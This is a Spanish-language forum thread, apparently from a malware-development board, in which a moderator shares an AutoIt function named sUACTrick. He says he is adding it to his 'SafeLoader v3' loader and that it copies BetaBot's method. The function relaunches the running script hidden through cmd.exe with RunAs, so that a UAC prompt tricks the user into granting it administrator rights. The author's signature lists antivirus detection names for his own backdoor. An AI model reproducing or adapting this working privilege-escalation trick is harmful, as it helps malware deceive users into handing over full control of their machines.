Mostrar mensajes previos
Ordenar por
por Scorpio Moderador
Esta es una pequeña función que estaba implementando a la SafeLoader v3, trata de elevar privilegios mediante Ingenieria Social, si no los consigue continua con su ejecución normal, es el mismo metodo que usa la BetaBot.

Imagen

#cs ----------------------------------------------------------------------------
  
 Script Name: sUACTrick
 AutoIt Version: 3.3.8.1
 Author: Scorpio
 Thanks To: Pink
  
 Script Function:
    Tries to elevate privileges by Social Engineering.
 
#ce ----------------------------------------------------------------------------

Func sUACTrick()
	Local $sVer

	$sVer = RegRead("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion", "CurrentVersion")

	If IsAdmin() = False And $sVer >= 6.0 Then
		ShellExecute(@SystemDir & '\cmd.exe', '/c "' & @ScriptFullPath & '"', '', 'RunAs', @SW_HIDE)
	EndIf
EndFunc
//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
por Scorpio Moderador
Pink escribió:Gracias bro. te falto pa x86.

Saludos
Gracias bro, se me olvido sustituir "HKLM64" por "HKLM", para leer Local Machine en x64 no hace falta expecificarlo, solo para escribirlo.

//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
Temas similares
stub autoit rompe server por vdixsniperzz en Troyanos y Herramientas
Variantes de tema
Responder

Volver a “Fuentes”